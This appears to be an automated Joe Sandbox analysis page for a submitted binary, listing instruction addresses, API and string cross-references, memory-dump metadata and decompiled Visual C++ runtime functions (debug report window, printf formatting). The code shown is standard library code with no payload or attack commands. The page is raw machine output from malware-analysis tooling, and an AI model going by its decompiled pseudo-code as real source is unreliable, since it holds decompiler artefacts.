0x004232c6
0x004232c9
0x004232c9
0x004232cf
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004232d7
0x004232d7
0x004232de
0x004232e4
0x004232ea
0x004232ed
0x004232f3
0x004232fa
0x00000000
0x00423b50
0x00423b50
0x00423b50
0x00423b50
0x00423b54
0x00000000
0x00000000
0x00000000
0x00423b54
0x00423b07
0x00423b0d
0x00423b10
0x00423b13
0x00423b16
0x00423b19
0x00423b1f
0x00423b1f
0x00423b1f
0x00423b27
0x00423b2b
0x00000000
0x00000000
0x00423b2d
0x00423b2d
0x00423b30
0x00423b33
0x00423b33
0x00423b38
0x00423b3b
0x00423b3e
0x00423b41
0x00423b44
0x00423b47
0x00423b4a
0x00423b4a
0x00423b4d
0x00423b50
0x00423b50
0x00423b54
0x00000000
0x00000000
0x00000000
0x00423b54
0x00423b50
0x00423300
0x00423306
0x00423306
0x0042330d
0x00000000
0x00423691
0x00423691
0x0042369f
0x0042369f
0x004236a2
0x00000000
0x00000000
0x00423314
0x00423317
0x00423317
0x0042331d
0x0042331f
0x00423322
0x00423322
0x00423325
0x00423325
0x00000000
0x00000000
0x0042345a
0x0042345d
0x0042345d
0x00423462
0x00423464
0x00423467
0x00423467
0x0042346a
0x0042346a
0x00000000
0x00000000
0x0042385d
0x0042385d
0x00000000
0x00000000
0x004233c4
0x004233c4
0x004233d0
0x004233d6
0x004233dd
0x004233eb
0x004233eb
0x004233f1
0x004233f4
0x00423400
0x00423455
0x00000000
0x00423455
0x004233df
0x004233df
0x004233e5
0x004233e9
0x00423408
0x00423408
0x0042340e
0x00423436
0x0042343d
0x00423443
0x00423446
0x00423449
0x0042344f
0x00423452
0x00423410
0x00423410
0x00423416
0x00423419
0x0042341c
0x00423422
0x00423425
0x00423428
0x0042342a
0x0042342d
0x0042342d
0x00000000
0x0042340e
0x00000000
0x00000000
0x004236a9
0x004236ac
0x004236af
0x004236b2
0x004236b8
0x004236bb
0x004236c2
0x004236c6
0x004236d1
0x004236d1
0x004236d5
0x004236ec
0x004236ec
0x004236f3
0x004236f5
0x004236f5
0x004236fc
0x004236fc
0x00423703
0x00423711
0x00423714
0x00423723
0x00423726
0x0042372a
0x0042373f
0x0042372c
0x0042372c
0x0042372f
0x00423735
0x0042373a
0x0042373a
0x0042372a
0x00423749
0x0042374c
0x0042374f
0x00423752
0x00423755
0x00423758
0x0042375e
0x00423764
0x0042376c
0x0042376d
0x00423770
0x00423771
0x00423774
0x00423775
0x0042377c
0x0042377d
0x00423780
0x00423781
0x00423784
0x00423785
0x0042378b
0x0042378c
0x0042379b
0x0042379d
0x004237a3
0x004237a3
0x004237a8
0x004237aa
0x004237ae
0x004237b0
0x004237b8
0x004237b9
0x004237bc
0x004237bd
0x004237cc
0x004237ce
0x004237ce
0x004237ae
0x004237d1
0x004237d8
0x004237db
0x004237e0
0x004237e0
0x004237e6
0x004237e8
0x004237f0
0x004237f1
0x004237f4
0x004237f5
0x00423803
0x00423805
0x00423805
0x004237e6
0x00423808
0x0042380b
0x0042380e
0x00423811
0x00423816
0x0042381b
0x0042381e
0x00423821
0x00423821
0x00423824
0x00423824
0x00423827
0x00423833
0x00423b50
0x00423b50
0x00423b54
0x00000000
0x00000000
0x00000000
0x00423b54
0x00000000
0x00423b50
0x004236d7
0x004236d7
0x004236de
0x004236e1
0x00000000
0x00000000
0x004236e3
0x004236e3
0x00000000
0x004236e3
0x004236c8
0x004236c8
0x00000000
0x00000000
0x00423328
0x00423328
0x00423333
0x0042333b
0x00423342
0x00423345
0x00423345
0x00423348
0x004233a8
0x0042334a
0x00423351
0x00423357
0x0042335d
0x00423364
0x00423367
0x0042336d
0x00423375
0x00423377
0x0042337e
0x00423385
0x0042338c
0x00423394
0x00423396
0x00423398
0x00423398
0x0042339f
0x004233af
0x004233b5
0x004233b8
0x00423b50
0x00423b50
0x00423b54
0x00000000
0x00000000
0x00000000
0x00423b54
0x00000000
0x0042383b
0x0042383e
0x00423841
0x00423844
0x00000000
0x00000000
0x00000000
0x00000000
0x004238a4
0x004238a4
0x004238ae
0x004238ae
0x004238b4
0x004238b6
0x004238b9
0x004238b9
0x004238bf
0x004238bf
0x00000000
0x00000000
0x00423856
0x00423856
0x00000000
0x00000000
0x0042346d
0x0042346d
0x00423471
0x0042347f
0x00423482
0x00423473
0x00423473
0x00423473
0x00423488
0x0042348e
0x00423494
0x004234a0
0x004234a6
0x004234a6
0x004234a9
0x00423531
0x00423531
0x00423535
0x00423537
0x0042353d
0x0042353d
0x00423540
0x00423547
0x0042354a
0x00423550
0x00423550
0x00423550
0x00423556
0x0042355c
0x0042355f
0x00423565
0x00423567
0x00000000
0x00000000
0x00423569
0x00423569
0x0042356f
0x00423572
0x00423574
0x00000000
0x00000000
0x00423576
0x0042357c
0x0042357f
0x0042357f
0x00423587
0x00423587
0x0042358d
0x0042358d
0x00423592
0x00000000
0x004234af
0x004234af
0x004234af
0x004234b3
0x004234b5
0x004234ba
0x004234ba
0x004234bd
0x004234c0
0x004234c6
0x004234d8
0x004234d8
0x004234d8
0x004234db
0x004234e1
0x00000000
0x00000000
0x004234e3
0x004234e3
0x004234e9
0x004234ec
0x004234ee
0x00000000
0x00000000
0x004234f0
0x004234f0
0x004234f9
0x004234ff
0x00423503
0x0042350b
0x0042350d
0x0042350f
0x00423515
0x00423515
0x00423518
0x00423518
0x00423524
0x00423527
0x004234cf
0x004234d2
0x004234d2
0x004234d5
0x004234d5
0x0042352f
0x00423595
0x00423b50
0x00423b50
0x00423b54
0x00000000
0x00000000
0x00000000
0x00423b54
0x00423b50
0x00000000
0x0042384d
0x0042384d
0x00000000
0x00000000
0x00423869
0x00423869
0x00423873
0x00423873
0x0042387d
0x0042387d
0x00423883
0x00423885
0x0042388a
0x00423894
0x00423894
0x00423897
0x0042389b
0x0042389b
0x004238c2
0x004238c5
0x004238c5
0x004238ca
0x004238ec
0x004238ec
0x004238f2
0x00423914
0x00423914
0x00423917
0x0042395e
0x0042395e
0x00423961
0x0042397e
0x00423982
0x0042398a
0x0042398a
0x0042398c
0x00423992
0x00423963
0x00423963
0x00423967
0x0042396f
0x00423970
0x00423976
0x00423976
0x00423919
0x0042391c
0x0042391c
0x0042391f
0x0042393d
0x00423949
0x0042394c
0x0042394d
0x00423953
0x00423921
0x00423921
0x00423925
0x0042392d
0x0042392e
0x0042392f
0x00423935
0x00423935
0x00423959
0x004238f4
0x004238f4
0x00423900
0x00423906
0x00423906
0x004238cc
0x004238cc
0x004238d8
0x004238de
0x004238de
0x0042399b
0x0042399b
0x0042399e
0x004239e0
0x004239e0
0x004239e6
0x004239ec
0x004239f2
0x00000000
0x004239a0
0x004239a0
0x004239a0
0x004239a7
0x00000000
0x00000000
0x004239a9
0x004239a9
0x004239b4
0x004239ba
0x004239bc
0x004239c2
0x004239c5
0x004239c7
0x004239cd
0x004239d6
0x004239db
0x004239f8
0x004239fb
0x004239fb
0x00423a00
0x00423a05
0x00423a05
0x00423a0b
0x00423a0d
0x00423a13
0x00423a19
0x00423a19
0x00423a22
0x00423a22
0x00423a0b
0x00423a28
0x00423a2c
0x00423a3a
0x00423a3d
0x00423a40
0x00423a47
0x00423a49
0x00423a49
0x00423a2e
0x00423a2e
0x00423a2e
0x00423a56
0x00423a56
0x00423a5c
0x00423a5e
0x00423a5e
0x00423a65
0x00423a6b
0x00423a6e
0x00423a6e
0x00423a6e
0x00423a74
0x00423a77
0x00423a7a
0x00423a7c
0x00000000
0x00000000
0x00423a7e
0x00423a84
0x00423a84
0x00423a8a
0x00000000
0x00000000
0x00423a8c
0x00423a8c
0x00423a8f
0x00423a92
0x00423a99
0x00423aa0
0x00423aa8
0x00423aae
0x00423ab1
0x00423ab4
0x00423abb
0x00423ac7
0x00423acd
0x00423ad3
0x00423ada
0x00423adc
0x00423ae2
0x00423ae2
0x00423ae8
0x00423ae8
0x00423aee
0x00423af7
0x00423afc
0x00423aff
0x00423a6e
0x00423a6e
0x00423a74
0x00423a77
0x00423a7a
0x00423a7c
0x00000000
0x00000000
0x00000000
0x00423a7c
0x00423a6e
0x004239ab
0x004239ab
0x004239b2
0x00000000
0x00000000
0x00000000
0x004239b2
0x00000000
0x00423b50
0x00423b50
0x00423b54
0x00000000
0x00000000
0x00000000
0x00423b54
0x00000000
0x00000000
0x004230d9
0x004230d9
0x004230dc
0x004230df
0x00000000
0x00000000
0x004230e4
0x004230e7
0x004230ed
0x00000000
0x00000000
0x004230ce
0x004230d1
0x004230d4
0x00000000
0x00000000
0x004230c3
0x004230c6
0x004230c9
0x00000000
0x00000000
0x004230f2
0x004230f2
0x004230f5
0x004230f5
0x004230f8
0x00000000
0x00000000
0x004230fb
0x00000000
0x00000000
0x00422f6b
0x00422f6b
0x00422f6d
0x00422f7b
0x00422f6f
0x00422f6f
0x00422f6f
0x00422f8b
0x00422f98
0x00422f9a
0x00422f9f
0x00422fa1
0x00422fa6
0x00422fab
0x00422fad
0x00422fb2
0x00422fb8
0x00422fba
0x00422fba
0x00422fb8
0x00422fbb
0x00422fc2
0x00000000
0x00422fc4
0x00422fc9
0x00422fe5
0x00422fed
0x00422ffa
0x00422fff
0x00000000
0x00422fff
0x00422fc2
0x00422f65
0x00423d50
0x00423d57
0x00423d6e
0x00423d6e
0x00423d78
0x00423d78
0x00423d7e
0x00423d8b
0x00423d8d
0x00423d92
0x00423d94
0x00423d99
0x00423d9e
0x00423da0
0x00423da5
0x00423dab
0x00423dad
0x00423dad
0x00423dab
0x00423db5
0x00423e00
0x00423e09
0x00423e0e
0x00423db7
0x00423dbc
0x00423dd8
0x00423de0
0x00423ded
0x00423df2
0x00423df2
0x00000000
0x00423db5
0x00423d59
0x00423d60
0x00000000
0x00000000
0x00423d62
0x00423d62
0x00000000
0x00423d62
0x00423612
0x00423612
0x00423617
0x00423633
0x0042363b
0x00423645
0x00423648
0x0042364d
0x00423e14
0x00423e21
0x00423e21
0x0042365d
0x00423663
0x00423683
0x00423665
0x00423672
0x00423672
0x00423685
0x00000000
0x00423685

APIs

_get_int_arg.LIBCMTD ref: 0042359E
__get_printf_count_output.LIBCMTD ref: 004235AC
__invalid_parameter.LIBCMTD ref: 00423633
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 00423648
_write_multi_char.LIBCMTD ref: 00423BDB
_write_string.LIBCMTD ref: 00423BF6
_write_multi_char.LIBCMTD ref: 00423C22
__mbtowc_l.LIBCMTD ref: 00423C91

Strings

_woutput_s_l, xrefs: 00422FDB, 00423629
("Incorrect format specifier", 0), xrefs: 00422F9A, 00422FE0
f:\dd\vctools\crt_bld\self_x86\crt\src\output.c, xrefs: 00422FA6, 00422FD6, 004235F4, 00423624
("'n' format specifier disabled", 0), xrefs: 004235E8, 0042362E

Memory Dump Source

Source File: 00000000.00000002.371044521.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.371034338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371262042.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371760532.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371769159.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371799237.00000000004E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q5W0I0pzFI.jbxd

Similarity

API ID: Locale_write_multi_char$UpdateUpdate::~___get_printf_count_output__invalid_parameter__mbtowc_l_get_int_arg_write_string
String ID: ("'n' format specifier disabled", 0)$("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_x86\crt\src\output.c
API String ID: 2386203720-1989478660
Opcode ID: 54a6fc80b2b59402b33458c2a676f5b86da828344e4e16e68ad17a06b736302a
Instruction ID: 7ee3ba459d7b1dd880535b68b57c400849f8e7597ba582db296a95b814ebd313
Opcode Fuzzy Hash: 54a6fc80b2b59402b33458c2a676f5b86da828344e4e16e68ad17a06b736302a
Instruction Fuzzy Hash: D8A1AEB1E002299BDB24DF45DC85BAEB774AB44305F5040DAE6097B282DB7CAE84CF5D

Uniqueness

Uniqueness Score: -1.00%

Function 00418F77 Relevance: 26.4, APIs: 6, Strings: 9, Instructions: 100
windowCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00418F77() {
				intOrPtr _t36;
				intOrPtr* _t37;
				void* _t40;
				void* _t48;
				void* _t62;
				void* _t63;
				signed int _t64;
				void* _t66;
				void* _t67;

				 *(_t64 - 0x114c) = "...";
				if( *((intOrPtr*)(_t64 + 0x14)) == 0) {
					 *(_t64 - 0x1150) = 0x405c11;
				} else {
					 *(_t64 - 0x1150) = "\nModule: ";
				}
				_push( *((intOrPtr*)(_t64 - 0x1124)));
				_push( *((intOrPtr*)(_t64 - 0x1128)));
				_push( *((intOrPtr*)(_t64 - 0x112c)));
				_push( *((intOrPtr*)(_t64 - 0x1130)));
				_push( *((intOrPtr*)(_t64 - 0x1134)));
				_push( *((intOrPtr*)(_t64 - 0x1138)));
				_push( *((intOrPtr*)(_t64 - 0x113c)));
				_push( *((intOrPtr*)(_t64 - 0x1140)));
				_push( *((intOrPtr*)(_t64 - 0x1144)));
				_push( *(_t64 - 0x114c));
				_push( *(_t64 - 0x1150));
				_push( *((intOrPtr*)(_t64 - 8)));
				_t61 =  *(_t64 + 8);
				_t53 = _t64 - 0x1010;
				_t36 = E0041BA90(_t64 - 0x1010, _t64 - 0x1010, 0x1000, 0xfff, "Debug %s!\n\nProgram: %s%s%s%s%s%s%s%s%s%s%s%s\n\n(Press Retry to debug the application)",  *((intOrPtr*)( *(_t64 + 8) * 4 + "X[@")));
				_t67 = _t66 + 0x44;
				 *((intOrPtr*)(_t64 - 0xc)) = _t36;
				if( *((intOrPtr*)(_t64 - 0xc)) < 0) {
					_t61 =  *(L00411810(_t53));
					E0040CCC0( *(L00411810(_t53)), 0x16, 0x22, L"(*_errno())", L"__crtMessageWindowA", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\dbgrpt.c", 0x160, 0);
					_t67 = _t67 + 0x20;
				}
				_t37 = L00411810(_t53);
				_t54 =  *((intOrPtr*)(_t64 - 0x1120));
				 *_t37 =  *((intOrPtr*)(_t64 - 0x1120));
				if( *((intOrPtr*)(_t64 - 0xc)) < 0) {
					_t61 = _t64 - 0x1010;
					E0040CC90(E004109A0(_t48, _t54, _t62, _t63, _t64 - 0x1010, 0x1000, "_CrtDbgReport: String too long or IO Error"), _t44, L"strcpy_s(szOutMessage, 4096, \"_CrtDbgReport: String too long or IO Error\")", L"__crtMessageWindowA", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\dbgrpt.c", 0x165, 0);
					_t67 = _t67 + 0x24;
				}
				 *((intOrPtr*)(_t64 - 0x111c)) = E0041F4F0(_t64 - 0x1010, "Microsoft Visual C++ Debug Library", 0x12012);
				if( *((intOrPtr*)(_t64 - 0x111c)) == 3) {
					E00413670(0x16);
					E0040D380(3);
				}
				if( *((intOrPtr*)(_t64 - 0x111c)) != 4) {
					_t40 = 0;
				} else {
					_t40 = 1;
				}
				return E00410900(_t40, _t48,  *(_t64 - 0x10) ^ _t64, _t61, _t62, _t63);
			}

0x00418f77
0x00418f91
0x00418f9f
0x00418f93
0x00418f93
0x00418f93
0x00418faf
0x00418fb6
0x00418fbd
0x00418fc4
0x00418fcb
0x00418fd2
0x00418fd9
0x00418fe0
0x00418fe7
0x00418fee
0x00418ff5
0x00418ff9
0x00418ffa
0x00419014
0x0041901b
0x00419020
0x00419023
0x0041902a
0x0041904b
0x0041904e
0x00419053
0x00419053
0x00419056
0x0041905b
0x00419061
0x00419067
0x00419089
0x00419099
0x0041909e
0x0041909e
0x004190ba
0x004190c7
0x004190cb
0x004190d5
0x004190d5
0x004190e1
0x004190ea
0x004190e3
0x004190e3
0x004190e3
0x004190f9

APIs

__snwprintf_s.LIBCMTD ref: 0041901B
__invoke_watson_if_oneof.LIBCMTD ref: 0041904E
_wcscpy_s.LIBCMTD ref: 00419090
__invoke_watson_if_error.LIBCMTD ref: 00419099
___crtMessageBoxW.LIBCMTD ref: 004190B2
_raise.LIBCMTD ref: 004190CB

Strings

(*_errno()), xrefs: 0041903D
_CrtDbgReport: String too long or IO Error, xrefs: 0041907F
__crtMessageWindowA, xrefs: 00419038, 00419075
f:\dd\vctools\crt_bld\self_x86\crt\src\dbgrpt.c, xrefs: 00419033, 00419070
..., xrefs: 00418F77, 00418FEE
strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error"), xrefs: 0041907A
Microsoft Visual C++ Debug Library, xrefs: 004190A6
Debug %s!Program: %s%s%s%s%s%s%s%s%s%s%s%s(Press Retry to debug the application), xrefs: 00419005
Module: , xrefs: 00418F93

Memory Dump Source

Source File: 00000000.00000002.371044521.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.371034338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371262042.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371760532.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371769159.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371799237.00000000004E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q5W0I0pzFI.jbxd

Similarity

API ID: Message___crt__invoke_watson_if_error__invoke_watson_if_oneof__snwprintf_s_raise_wcscpy_s
String ID: Module: $(*_errno())$...$Debug %s!Program: %s%s%s%s%s%s%s%s%s%s%s%s(Press Retry to debug the application)$Microsoft Visual C++ Debug Library$_CrtDbgReport: String too long or IO Error$__crtMessageWindowA$f:\dd\vctools\crt_bld\self_x86\crt\src\dbgrpt.c$strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error")
API String ID: 1485069716-2339404796
Opcode ID: ece6362a401c9863a2ac90bd54d56891e8ddd7748759ab3d1170b584caab979a
Instruction ID: f9966310ca8cfcfba26289376041d164eb27c5a943c1980b5e501be3c7a563ff
Opcode Fuzzy Hash: ece6362a401c9863a2ac90bd54d56891e8ddd7748759ab3d1170b584caab979a
Instruction Fuzzy Hash: 54316275E40218ABDB24EB95DC46FDA73B5AB4C704F0080AAF309762C1D6B86AC18F59

Uniqueness

Uniqueness Score: -1.00%

Function 00422075 Relevance: 23.0, APIs: 9, Strings: 4, Instructions: 225
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E00422075(void* __eflags) {
				intOrPtr _t495;
				signed int _t497;
				signed int _t503;
				void* _t508;
				signed int _t510;
				void* _t530;
				signed int _t548;
				void* _t558;
				signed int _t566;
				signed int _t593;
				void* _t621;
				void* _t622;
				signed int _t623;
				void* _t625;
				void* _t626;

				L0:
				while(1) {
					L0:
					_t495 = E0041F270(_t623 + 0x14);
					_t626 = _t625 + 4;
					 *((intOrPtr*)(_t623 - 0x288)) = _t495;
					if( *((intOrPtr*)(_t623 - 0x288)) == 0) {
						goto L82;
					}
					L81:
					__ecx =  *(__ebp - 0x288);
					if( *(__ecx + 4) != 0) {
						L83:
						 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000800;
						if(( *(__ebp - 0x10) & 0x00000800) == 0) {
							 *(__ebp - 0xc) = 0;
							__edx =  *(__ebp - 0x288);
							__eax =  *(__edx + 4);
							 *(__ebp - 4) =  *(__edx + 4);
							__ecx =  *(__ebp - 0x288);
							__edx =  *__ecx;
							 *(__ebp - 0x24) =  *__ecx;
						} else {
							__edx =  *(__ebp - 0x288);
							__eax =  *(__edx + 4);
							 *(__ebp - 4) =  *(__edx + 4);
							__ecx =  *(__ebp - 0x288);
							__eax =  *__ecx;
							asm("cdq");
							 *__ecx - __edx =  *__ecx - __edx >> 1;
							 *(__ebp - 0x24) =  *__ecx - __edx >> 1;
							 *(__ebp - 0xc) = 1;
						}
						L86:
						while(1) {
							L190:
							if( *(_t623 - 0x28) != 0) {
								goto L216;
							}
							L191:
							if(( *(_t623 - 0x10) & 0x00000040) != 0) {
								if(( *(_t623 - 0x10) & 0x00000100) == 0) {
									if(( *(_t623 - 0x10) & 0x00000001) == 0) {
										if(( *(_t623 - 0x10) & 0x00000002) != 0) {
											 *((char*)(_t623 - 0x14)) = 0x20;
											 *(_t623 - 0x1c) = 1;
										}
									} else {
										 *((char*)(_t623 - 0x14)) = 0x2b;
										 *(_t623 - 0x1c) = 1;
									}
								} else {
									 *((char*)(_t623 - 0x14)) = 0x2d;
									 *(_t623 - 0x1c) = 1;
								}
							}
							 *((intOrPtr*)(_t623 - 0x2c4)) =  *((intOrPtr*)(_t623 - 0x18)) -  *(_t623 - 0x24) -  *(_t623 - 0x1c);
							if(( *(_t623 - 0x10) & 0x0000000c) == 0) {
								E00422C60(0x20,  *((intOrPtr*)(_t623 - 0x2c4)),  *((intOrPtr*)(_t623 + 8)), _t623 - 0x24c);
								_t626 = _t626 + 0x10;
							}
							E00422CA0( *(_t623 - 0x1c), _t623 - 0x14,  *(_t623 - 0x1c),  *((intOrPtr*)(_t623 + 8)), _t623 - 0x24c);
							_t626 = _t626 + 0x10;
							if(( *(_t623 - 0x10) & 0x00000008) != 0) {
								if(( *(_t623 - 0x10) & 0x00000004) == 0) {
									E00422C60(0x30,  *((intOrPtr*)(_t623 - 0x2c4)),  *((intOrPtr*)(_t623 + 8)), _t623 - 0x24c);
									_t626 = _t626 + 0x10;
								}
							}
							if( *(_t623 - 0xc) == 0) {
								L212:
								E00422CA0( *(_t623 - 4),  *(_t623 - 4),  *(_t623 - 0x24),  *((intOrPtr*)(_t623 + 8)), _t623 - 0x24c);
								_t626 = _t626 + 0x10;
								goto L213;
							} else {
								L204:
								if( *(_t623 - 0x24) <= 0) {
									goto L212;
								}
								L205:
								 *(_t623 - 0x2dc) = 0;
								 *(_t623 - 0x2c8) =  *(_t623 - 4);
								 *(_t623 - 0x2cc) =  *(_t623 - 0x24);
								while(1) {
									L206:
									 *(_t623 - 0x2cc) =  *(_t623 - 0x2cc) - 1;
									if( *(_t623 - 0x2cc) == 0) {
										break;
									}
									L207:
									 *(_t623 - 0x32e) =  *( *(_t623 - 0x2c8));
									_t548 = E00424E90(_t623 - 0x2d0, _t623 - 0x2d8, 6,  *(_t623 - 0x32e) & 0x0000ffff);
									_t626 = _t626 + 0x10;
									 *(_t623 - 0x2dc) = _t548;
									 *(_t623 - 0x2c8) =  *(_t623 - 0x2c8) + 2;
									if( *(_t623 - 0x2dc) != 0) {
										L209:
										 *(_t623 - 0x24c) = 0xffffffff;
										break;
									}
									L208:
									if( *(_t623 - 0x2d0) != 0) {
										L210:
										E00422CA0( *((intOrPtr*)(_t623 + 8)), _t623 - 0x2d8,  *(_t623 - 0x2d0),  *((intOrPtr*)(_t623 + 8)), _t623 - 0x24c);
										_t626 = _t626 + 0x10;
										continue;
									}
									goto L209;
								}
								L211:
								L213:
								if( *(_t623 - 0x24c) >= 0) {
									if(( *(_t623 - 0x10) & 0x00000004) != 0) {
										E00422C60(0x20,  *((intOrPtr*)(_t623 - 0x2c4)),  *((intOrPtr*)(_t623 + 8)), _t623 - 0x24c);
										_t626 = _t626 + 0x10;
									}
								}
							}
							L216:
							if( *(_t623 - 0x20) != 0) {
								L0040F230( *(_t623 - 0x20), 2);
								_t626 = _t626 + 8;
								 *(_t623 - 0x20) = 0;
							}
							while(1) {
								L218:
								 *(_t623 - 0x251) =  *( *(_t623 + 0xc));
								_t594 =  *(_t623 - 0x251);
								 *(_t623 + 0xc) =  *(_t623 + 0xc) + 1;
								if( *(_t623 - 0x251) == 0 ||  *(_t623 - 0x24c) < 0) {
									break;
								} else {
									if( *(_t623 - 0x251) < 0x20 ||  *(_t623 - 0x251) > 0x78) {
										 *(_t623 - 0x310) = 0;
									} else {
										 *(_t623 - 0x310) =  *( *(_t623 - 0x251) + L"h != _T(\'\\0\'))") & 0xf;
									}
								}
								L7:
								 *(_t623 - 0x250) =  *(_t623 - 0x310);
								_t510 =  *(_t623 - 0x250) * 9;
								_t566 =  *(_t623 - 0x25c);
								_t594 = ( *(_t510 + _t566 + 0x4081a0) & 0x000000ff) >> 4;
								 *(_t623 - 0x25c) = ( *(_t510 + _t566 + 0x4081a0) & 0x000000ff) >> 4;
								if( *(_t623 - 0x25c) != 8) {
									L16:
									 *(_t623 - 0x318) =  *(_t623 - 0x25c);
									if( *(_t623 - 0x318) > 7) {
										continue;
									}
									L17:
									switch( *((intOrPtr*)( *(_t623 - 0x318) * 4 +  &M00422AB0))) {
										case 0:
											L18:
											 *(_t623 - 0xc) = 0;
											_t513 = E00420DA0( *(_t623 - 0x251) & 0x000000ff, E004103A0(_t623 - 0x40));
											_t629 = _t626 + 8;
											__eflags = _t513;
											if(_t513 == 0) {
												L24:
												E00422BC0( *(_t623 - 0x251) & 0x000000ff,  *(_t623 - 0x251) & 0x000000ff,  *((intOrPtr*)(_t623 + 8)), _t623 - 0x24c);
												_t626 = _t629 + 0xc;
												goto L218;
											} else {
												E00422BC0( *((intOrPtr*)(_t623 + 8)),  *(_t623 - 0x251) & 0x000000ff,  *((intOrPtr*)(_t623 + 8)), _t623 - 0x24c);
												_t629 = _t629 + 0xc;
												_t571 =  *( *(_t623 + 0xc));
												 *(_t623 - 0x251) =  *( *(_t623 + 0xc));
												_t594 =  *(_t623 + 0xc) + 1;
												__eflags = _t594;
												 *(_t623 + 0xc) = _t594;
												asm("sbb eax, eax");
												 *(_t623 - 0x27c) =  ~( ~( *(_t623 - 0x251)));
												if(_t594 == 0) {
													_push(L"(ch != _T(\'\\0\'))");
													_push(0);
													_push(0x486);
													_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
													_push(2);
													_t525 = L0040C820();
													_t629 = _t629 + 0x14;
													__eflags = _t525 - 1;
													if(_t525 == 1) {
														asm("int3");
													}
												}
												L22:
												__eflags =  *(_t623 - 0x27c);
												if( *(_t623 - 0x27c) != 0) {
													goto L24;
												} else {
													 *((intOrPtr*)(L00411810(_t571))) = 0x16;
													E0040C660(_t558, _t571, _t621, _t622, L"(ch != _T(\'\\0\'))", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x486, 0);
													 *(_t623 - 0x2f4) = 0xffffffff;
													E00410370(_t623 - 0x40);
													_t503 =  *(_t623 - 0x2f4);
													goto L229;
												}
											}
										case 1:
											L25:
											 *(__ebp - 0x2c) = 0;
											__edx =  *(__ebp - 0x2c);
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											__eax =  *(__ebp - 0x28);
											 *(__ebp - 0x18) =  *(__ebp - 0x28);
											__ecx =  *(__ebp - 0x18);
											 *(__ebp - 0x1c) = __ecx;
											 *(__ebp - 0x10) = 0;
											 *(__ebp - 0x30) = 0xffffffff;
											 *(__ebp - 0xc) = 0;
											goto L218;
										case 2:
											L26:
											__edx =  *((char*)(__ebp - 0x251));
											 *(__ebp - 0x31c) =  *((char*)(__ebp - 0x251));
											 *(__ebp - 0x31c) =  *(__ebp - 0x31c) - 0x20;
											 *(__ebp - 0x31c) =  *(__ebp - 0x31c) - 0x20;
											__eflags =  *(__ebp - 0x31c) - 0x10;
											if( *(__ebp - 0x31c) > 0x10) {
												goto L33;
											}
											L27:
											__ecx =  *(__ebp - 0x31c);
											_t74 = __ecx + 0x422ae8; // 0x498d04
											__edx =  *_t74 & 0x000000ff;
											switch( *((intOrPtr*)(( *_t74 & 0x000000ff) * 4 +  &M00422AD0))) {
												case 0:
													goto L30;
												case 1:
													goto L31;
												case 2:
													goto L29;
												case 3:
													goto L28;
												case 4:
													goto L32;
												case 5:
													goto L33;
											}
										case 3:
											L34:
											__edx =  *((char*)(__ebp - 0x251));
											__eflags =  *((char*)(__ebp - 0x251)) - 0x2a;
											if( *((char*)(__ebp - 0x251)) != 0x2a) {
												__eax =  *(__ebp - 0x18);
												__eax =  *(__ebp - 0x18) * 0xa;
												__eflags = __eax;
												__ecx =  *((char*)(__ebp - 0x251));
												_t98 = __ecx - 0x30; // -48
												__edx = __eax + _t98;
												 *(__ebp - 0x18) = __eax + _t98;
											} else {
												__eax = __ebp + 0x14;
												 *(__ebp - 0x18) = E0041F270(__ebp + 0x14);
												__eflags =  *(__ebp - 0x18);
												if( *(__ebp - 0x18) < 0) {
													__ecx =  *(__ebp - 0x10);
													__ecx =  *(__ebp - 0x10) | 0x00000004;
													__eflags = __ecx;
													 *(__ebp - 0x10) = __ecx;
													 *(__ebp - 0x18) =  ~( *(__ebp - 0x18));
													 *(__ebp - 0x18) =  ~( *(__ebp - 0x18));
												}
											}
											goto L218;
										case 4:
											L40:
											 *(__ebp - 0x30) = 0;
											goto L218;
										case 5:
											L41:
											__eax =  *((char*)(__ebp - 0x251));
											__eflags =  *((char*)(__ebp - 0x251)) - 0x2a;
											if( *((char*)(__ebp - 0x251)) != 0x2a) {
												__edx =  *(__ebp - 0x30);
												__edx =  *(__ebp - 0x30) * 0xa;
												__eflags = __edx;
												_t109 =  *((char*)(__ebp - 0x251)) - 0x30; // -48
												__ecx = __edx + _t109;
												 *(__ebp - 0x30) = __ecx;
											} else {
												__ecx = __ebp + 0x14;
												 *(__ebp - 0x30) = E0041F270(__ebp + 0x14);
												__eflags =  *(__ebp - 0x30);
												if( *(__ebp - 0x30) < 0) {
													 *(__ebp - 0x30) = 0xffffffff;
												}
											}
											goto L218;
										case 6:
											L47:
											__edx =  *((char*)(__ebp - 0x251));
